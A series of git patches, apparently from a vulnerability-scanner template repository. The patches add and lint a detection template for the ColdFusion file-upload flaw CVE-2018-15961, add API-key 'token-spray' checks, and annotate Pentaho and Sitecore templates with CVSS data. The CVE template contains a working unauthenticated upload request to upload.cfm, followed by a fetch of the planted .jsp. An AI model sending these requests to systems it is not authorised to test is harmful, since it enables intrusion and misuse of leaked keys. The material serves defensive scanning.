40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2018/CVE-2018-15961 diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961 new file mode 100644 index 0000000000..6495051c18 --- /dev/null +++ b/cves/2018/CVE-2018-15961 @@ -0,0 +1,40 @@ +info: + name: CVE-2018-15961 + author: SkyLark-Lab, ImNightmaree + severity: critical + tags: server,cve,cve2018,rce,coldfusion,fileupload + +requests: + - raw: + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg + + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + + {{randstr}} + -----------------------------24464570528145-- + + + + - method: GET + path: + - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + + matchers-condition: and + matchers: + + - type: word + words: + - "{{randstr}}" + + - type: status + status: + - 200 From 136fd744c9c5a02a4dfe2d089e2b2b4b339de2f0 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 17:51:54 +0000 Subject: [PATCH 3527/4083] Missed a space on author. --- cves/2018/CVE-2018-15961 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961 index 6495051c18..a529ed82e5 100644 --- a/cves/2018/CVE-2018-15961 +++ b/cves/2018/CVE-2018-15961 @@ -1,6 +1,6 @@ info: name: CVE-2018-15961 - author: SkyLark-Lab, ImNightmaree + author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload From 866bcfa0f653f65da2e0bb1ea69fc2b5b653e698 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 10 Nov 2021 23:23:11 +0530 Subject: [PATCH 3528/4083] Rename CVE-2018-15961 to CVE-2018-15961.yaml --- cves/2018/{CVE-2018-15961 => CVE-2018-15961.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018-15961 => CVE-2018-15961.yaml} (100%) diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961.yaml similarity index 100% rename from cves/2018/CVE-2018-15961 rename to cves/2018/CVE-2018-15961.yaml From 90c265672fc15a5645bb9bfd95ed5e8f1e6d4368 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:00:26 +0000 Subject: [PATCH 3529/4083] Linting --- cves/2018/CVE-2018-15961.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index a529ed82e5..539651ca46 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -3,7 +3,6 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload - requests: - raw: - | From 03c24bd12d8623cfd8b3fc4fd370a3c8a1cf3444 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:02:59 +0000 Subject: [PATCH 3530/4083] Linting --- cves/2018/CVE-2018-15961.yaml | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 539651ca46..f36246b29d 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -3,26 +3,24 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload + requests: - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" - Content-Type: image/jpeg - - %%%%%%%% - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" - - {{randstr}} - -----------------------------24464570528145-- + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + {{randstr}} + -----------------------------24464570528145-- - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" From 3852eedb4628f0f6c99da29b3984e1ce978ddf39 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:05:59 +0000 Subject: [PATCH 3531/4083] Linting --- cves/2018/CVE-2018-15961.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index f36246b29d..fef6b1da6d 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,9 +1,11 @@ +id:CVE-2018-15961 + info: name: CVE-2018-15961 author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload - + requests: - raw: - | From 40e6c30e0d7084c507e6947510b1807febf9a6b6 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:08:18 +0000 Subject: [PATCH 3532/4083] Linting --- cves/2018/CVE-2018-15961.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index fef6b1da6d..ec9955c574 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,4 +1,4 @@ -id:CVE-2018-15961 +id: CVE-2018-15961 info: name: CVE-2018-15961 From 8f8888481d4952efcbb90697e75a7d9d1a4a4014 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:14:05 +0000 Subject: [PATCH 3534/4083] Linting --- cves/2018/CVE-2018-15961.yaml | 27 +++++++++++++-------------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index ec9955c574..8debd1d9e8 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -6,23 +6,23 @@ info: severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload -requests: +requests: - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" - Content-Type: image/jpeg + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg - %%%%%%%% - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" - {{randstr}} - -----------------------------24464570528145-- + {{randstr}} + -----------------------------24464570528145-- - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" @@ -33,7 +33,6 @@ requests: - type: word words: - "{{randstr}}" - - type: status status: - 200 From 5d3df1ca32107e8e887e4bd4ddc92e084bddb917 Mon Sep 17 00:00:00 2001 From: "zzeitlin@bishopfox.com" <58756038+zzeitlin@users.noreply.github.com> Date: Wed, 10 Nov 2021 20:49:36 +0000 Subject: [PATCH 3535/4083] add accuweather api --- token-spray/accuweather.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 token-spray/accuweather.yaml diff --git a/token-spray/accuweather.yaml b/token-spray/accuweather.yaml new file mode 100644 index 0000000000..a6cf53bd4e --- /dev/null +++ b/token-spray/accuweather.yaml @@ -0,0 +1,21 @@ +id: api-accuweather + +info: + name: AccuWeather API Test + author: zzeitlin + reference: https://developer.accuweather.com/apis + severity: info + tags: token-spray,accuweather + +requests: + - method: GET + path: + - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" + + matchers: + - type: word + part: body + words: + - '"Version"' + - '"LocalizedName"' + - '"DataSets"' From f41bd00ca393511b37ae8ad55b0af17be3a79d72 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Nov 2021 01:09:31 +0000 Subject: [PATCH 3536/4083] Auto Generated CVE annotations [Thu Nov 11 01:09:31 UTC 2021] :robot: --- cves/2021/CVE-2021-31602.yaml | 7 ++++++- cves/2021/CVE-2021-42237.yaml | 5 +++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 3b8ecf630d..14a0ed5e18 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -3,7 +3,7 @@ id: CVE-2021-31602 info: name: Pentaho <= 9.1 Authentication Bypass of Spring APIs author: pussycat0x - severity: medium + severity: high reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software @@ -13,6 +13,11 @@ info: tags: cve,cve2021,pentaho,auth-bypass description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-31602 + cwe-id: CWE-863 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml index 1e8ce1c74c..737556c0de 100644 --- a/cves/2021/CVE-2021-42237.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -19,6 +19,11 @@ info: metadata: shodan-query: http.title:"SiteCore" tags: rce,sitecore,deserialization,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-42237 + cwe-id: CWE-502 requests: - raw: From fc4084be3757890c36ebb40b6f2c0671c41765e9 Mon Sep 17 00:00:00 2001 From: daffainfo Date: Thu, 11 Nov 2021 08:11:01 +0700 Subject: [PATCH 3537/4083] Add 4 token-spray templates --- token-spray/api-bible.yaml | 27 +++++++++++++++++++++++++++ token-spray/api-petfinder.yaml | 30 ++++++++++++++++++++++++++++++ token-spray/api-stytch.yaml | 29 +++++++++++++++++++++++++++++ token-spray/google-books.yaml | 25 +++++++++++++++++++++++++ 4 files changed, 111 insertions(+) create mode 100644 token-spray/api-bible.yaml create mode 100644 token-spray/api-petfinder.yaml create mode 100644 token-spray/api-stytch.yaml create mode 100644 token-spray/google-books.yaml diff --git a/token-spray/api-bible.yaml b/token-spray/api-bible.yaml new file mode 100644 index 0000000000..a1d8448c85 --- /dev/null +++ b/token-spray/api-bible.yaml @@ -0,0 +1,27 @@ +id: api-bible + +info: + name: API.Bible API Test + author: daffainfo + severity: info + reference: + - https://docs.api.bible + - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md + tags: token-spray,bible + +self-contained: true +requests: + - method: GET + path: + - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" + headers: + api-key: "{{token}}" + + matchers: + - type: word + words: + - "orgId" + - "bookId" + - "bibleId" + part: body + condition: and \ No newline at end of file diff --git a/token-spray/api-petfinder.yaml b/token-spray/api-petfinder.yaml new file mode 100644 index 0000000000..ff3c52be1d --- /dev/null +++ b/token-spray/api-petfinder.yaml @@ -0,0 +1,30 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md + tags: token-spray,petfinder + +self-contained: true +requests: + - raw: + - | + POST /v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{ID}}&client_secret={{SECRET}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and \ No newline at end of file diff --git a/token-spray/api-stytch.yaml b/token-spray/api-stytch.yaml new file mode 100644 index 0000000000..836fa7f038 --- /dev/null +++ b/token-spray/api-stytch.yaml @@ -0,0 +1,29 @@ +id: api-stytch + +info: + name: Stytch API Test + author: daffainfo + severity: info + reference: + - https://stytch.com/docs + - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md + tags: token-spray,stytch + +self-contained: true +requests: + - raw: + - | + POST /v1/users HTTP/1.1 + Authorization: Basic {{base64(ID + ':' + SECRET)}} + Host: test.stytch.com + Content-Type: application/json + Content-Length: 28 + + {"email": "test@stytch.com"} + + matchers: + - type: word + part: body + words: + - '"error_type":"unauthorized_credentials"' + negative: true \ No newline at end of file diff --git a/token-spray/google-books.yaml b/token-spray/google-books.yaml new file mode 100644 index 0000000000..b4e584d698 --- /dev/null +++ b/token-spray/google-books.yaml @@ -0,0 +1,25 @@ +id: api-googlebooks + +info: + name: Google Books API Test + author: daffainfo + severity: info + reference: + - https://developers.google.com/books/docs/overview + - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Google%20Books.md + tags: token-spray,google,books + +self-contained: true +requests: + - method: GET + path: + - "https://www.googleapis.com/books/v1/volumes/zyTCAlFPjgYC?key={{token}}" + + matchers: + - type: word + words: + - "kind" + - "id" + - "etag" + part: body + condition: and \ No newline at end of file From 84cde9703c7c8d9e1c273ebf5be4960ad33b5e2e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:28:24 +0530 Subject: [PATCH 3538/4083] Update CVE-2021-31602.yaml --- cves/2021/CVE-2021-31602.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 14a0ed5e18..fe518c209b 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -4,20 +4,20 @@ info: name: Pentaho <= 9.1 Authentication Bypass of Spring APIs author: pussycat0x severity: high + description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf metadata: shodan-query: 'Pentaho' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-31602 + cwe-id: CWE-863 tags: cve,cve2021,pentaho,auth-bypass - description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-31602 - cwe-id: CWE-863 requests: - method: GET path: @@ -36,4 +36,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 423c7c434c8af4ed69277c3b8d35d67db0430122 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:28:47 +0530 Subject: [PATCH 3539/4083] Update CVE-2021-42237.yaml --- cves/2021/CVE-2021-42237.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml index 737556c0de..34c06043d1 100644 --- a/cves/2021/CVE-2021-42237.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -18,12 +18,12 @@ info: For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. metadata: shodan-query: http.title:"SiteCore" - tags: rce,sitecore,deserialization,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-42237 cwe-id: CWE-502 + tags: rce,sitecore,deserialization,oast requests: - raw: @@ -116,4 +116,4 @@ requests: - type: word part: body words: - - "System.ArgumentNullException" \ No newline at end of file + - "System.ArgumentNullException" From f55e3865a3216e53dfd88a2ab80df88fe2276eee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:29:22 +0530 Subject: [PATCH 3540/4083] Update api-bible.yaml --- token-spray/api-bible.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/token-spray/api-bible.yaml b/token-spray/api-bible.yaml index a1d8448c85..313d9d6612 100644 --- a/token-spray/api-bible.yaml +++ b/token-spray/api-bible.yaml @@ -19,9 +19,9 @@ requests: matchers: - type: word + part: body words: - "orgId" - "bookId" - "bibleId" - part: body - condition: and \ No newline at end of file + condition: and From 09f21f8c904692e71b619dc4b75647d9b30101a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:32:13 +0530 Subject: [PATCH 3541/4083] Update api-petfinder.yaml --- token-spray/api-petfinder.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/token-spray/api-petfinder.yaml b/token-spray/api-petfinder.yaml index ff3c52be1d..bc6f9b672a 100644 --- a/token-spray/api-petfinder.yaml +++ b/token-spray/api-petfinder.yaml @@ -13,7 +13,7 @@ self-contained: true requests: - raw: - | - POST /v2/oauth2/token HTTP/1.1 + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 Host: api.petfinder.com Content-Type: application/x-www-form-urlencoded Content-Length: 81 @@ -27,4 +27,4 @@ requests: - '"token_type"' - '"expires_in"' - '"access_token"' - condition: and \ No newline at end of file + condition: and From 17792cab2b7237a4a1b41d8c85fd74cf746f25a9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:34:08 +0530 Subject: [PATCH 3542/4083] Update api-petfinder.yaml --- token-spray/api-petfinder.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/api-petfinder.yaml b/token-spray/api-petfinder.yaml index bc6f9b672a..f4f57001c7 100644 --- a/token-spray/api-petfinder.yaml +++ b/token-spray/api-petfinder.yaml @@ -12,7 +12,7 @@ info: self-contained: true requests: - raw: - - | + - | POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 Host: api.petfinder.com Content-Type: application/x-www-form-urlencoded From 699554965faf7bf53a12bf474fe36a9c85447aad Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:39:28 +0530 Subject: [PATCH 3543/4083] Update google-books.yaml --- token-spray/google-books.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/token-spray/google-books.yaml b/token-spray/google-books.yaml index b4e584d698..5e3a013f47 100644 --- a/token-spray/google-books.yaml +++ b/token-spray/google-books.yaml @@ -17,9 +17,9 @@ requests: matchers: - type: word + part: body words: - "kind" - "id" - "etag" - part: body - condition: and \ No newline at end of file + condition: and From c60ee86d1b6e841ef0f3be5ca4b69ed4baf4d13f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:49:12 +0530 Subject: [PATCH 3544/4083] Update api-stytch.yaml --- token-spray/api-stytch.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/token-spray/api-stytch.yaml b/token-spray/api-stytch.yaml index 836fa7f038..d6c6fb82e5 100644 --- a/token-spray/api-stytch.yaml +++ b/token-spray/api-stytch.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: info reference: - - https://stytch.com/docs + - https://stytch.com/docs/api - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md tags: token-spray,stytch @@ -13,8 +13,8 @@ self-contained: true requests: - raw: - | - POST /v1/users HTTP/1.1 - Authorization: Basic {{base64(ID + ':' + SECRET)}} + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(PROJECT {{ID}} + ':' + {{SECRET}})}} Host: test.stytch.com Content-Type: application/json Content-Length: 28 @@ -25,5 +25,7 @@ requests: - type: word part: body words: - - '"error_type":"unauthorized_credentials"' - negative: true \ No newline at end of file + - '"status_code":' + - '"request_id":' + - '"user_id":' + condition: and From dfb1df800508cab100fef9c909dc0ade4ded7a22 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:51:16 +0530 Subject: [PATCH 3545/4083] Update api-stytch.yaml --- token-spray/api-stytch.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/token-spray/api-stytch.yaml b/token-spray/api-stytch.yaml index d6c6fb82e5..bab2000791 100644 --- a/token-spray/api-stytch.yaml +++ b/token-spray/api-stytch.yaml @@ -12,14 +12,14 @@ info: self-contained: true requests: - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(PROJECT {{ID}} + ':' + {{SECRET}})}} - Host: test.stytch.com - Content-Type: application/json - Content-Length: 28 - - {"email": "test@stytch.com"} + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(PROJECT {{ID}} + ':' + {{SECRET}})}} + Host: test.stytch.com + Content-Type: application/json + Content-Length: 28 + + {"email": "test@stytch.com"} matchers: - type: word From 297e7cc5a0d592a5882cd4eeee2ce4539ace8117 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 10:56:56 +0530 Subject: [PATCH 3546/4083] Update and rename accuweather.yaml to api-accuweather.yaml --- token-spray/{accuweather.yaml => api-accuweather.yaml} | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) rename token-spray/{accuweather.yaml => api-accuweather.yaml} (95%) diff --git a/token-spray/accuweather.yaml b/token-spray/api-accuweather.yaml similarity index 95% rename from token-spray/accuweather.yaml rename to token-spray/api-accuweather.yaml index a6cf53bd4e..8bdb637183 100644 --- a/token-spray/accuweather.yaml +++ b/token-spray/api-accuweather.yaml @@ -3,8 +3,8 @@ id: api-accuweather info: name: AccuWeather API Test author: zzeitlin - reference: https://developer.accuweather.com/apis severity: info + reference: https://developer.accuweather.com/apis tags: token-spray,accuweather requests: @@ -19,3 +19,4 @@ requests: - '"Version"' - '"LocalizedName"' - '"DataSets"' + condition: and From 206b05650673884a1d3f24c2f624a2d6594e47fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Nov 2021 05:29:39 +0000 Subject: [PATCH 3547/4083] Auto Generated CVE annotations [Thu Nov 11 05:29:39 UTC 2021] :robot: --- cves/2021/CVE-2021-31602.yaml | 7 ++++++- cves/2021/CVE-2021-42237.yaml | 5 +++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 3b8ecf630d..14a0ed5e18 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -3,7 +3,7 @@ id: CVE-2021-31602 info: name: Pentaho <= 9.1 Authentication Bypass of Spring APIs author: pussycat0x - severity: medium + severity: high reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software @@ -13,6 +13,11 @@ info: tags: cve,cve2021,pentaho,auth-bypass description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-31602 + cwe-id: CWE-863 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml index 1e8ce1c74c..737556c0de 100644 --- a/cves/2021/CVE-2021-42237.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -19,6 +19,11 @@ info: metadata: shodan-query: http.title:"SiteCore" tags: rce,sitecore,deserialization,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-42237 + cwe-id: CWE-502 requests: - raw: From 7a08bde65d0e2c891552864636dd9e35b0e35cf0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 11:16:37 +0530 Subject: [PATCH 3548/4083] Update CVE-2021-42237.yaml --- cves/2021/CVE-2021-42237.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-42237.yaml b/cves/2021/CVE-2021-42237.yaml index 737556c0de..34c06043d1 100644 --- a/cves/2021/CVE-2021-42237.yaml +++ b/cves/2021/CVE-2021-42237.yaml @@ -18,12 +18,12 @@ info: For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. metadata: shodan-query: http.title:"SiteCore" - tags: rce,sitecore,deserialization,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-42237 cwe-id: CWE-502 + tags: rce,sitecore,deserialization,oast requests: - raw: @@ -116,4 +116,4 @@ requests: - type: word part: body words: - - "System.ArgumentNullException" \ No newline at end of file + - "System.ArgumentNullException" From a6039654a12e4b9150c49a0a85c8e936501a15ce Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 11:17:25 +0530 Subject: [PATCH 3549/4083] Update CVE-2021-31602.yaml --- cves/2021/CVE-2021-31602.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml index 14a0ed5e18..1fbcf7f34c 100644 --- a/cves/2021/CVE-2021-31602.yaml +++ b/cves/2021/CVE-2021-31602.yaml @@ -4,20 +4,20 @@ info: name: Pentaho <= 9.1 Authentication Bypass of Spring APIs author: pussycat0x severity: high + description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials" reference: - https://seclists.org/fulldisclosure/2021/Nov/13 - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf metadata: shodan-query: 'Pentaho' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-31602 + cwe-id: CWE-863 tags: cve,cve2021,pentaho,auth-bypass - description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-31602 - cwe-id: CWE-863 requests: - method: GET path: @@ -36,4 +36,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 6b896965a153e1bd04b9973f3b802716610deb47 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 11:51:24 +0530 Subject: [PATCH 3550/4083] Update CVE-2018-15961.yaml --- cves/2018/CVE-2018-15961.yaml | 16 +++++++++++----- 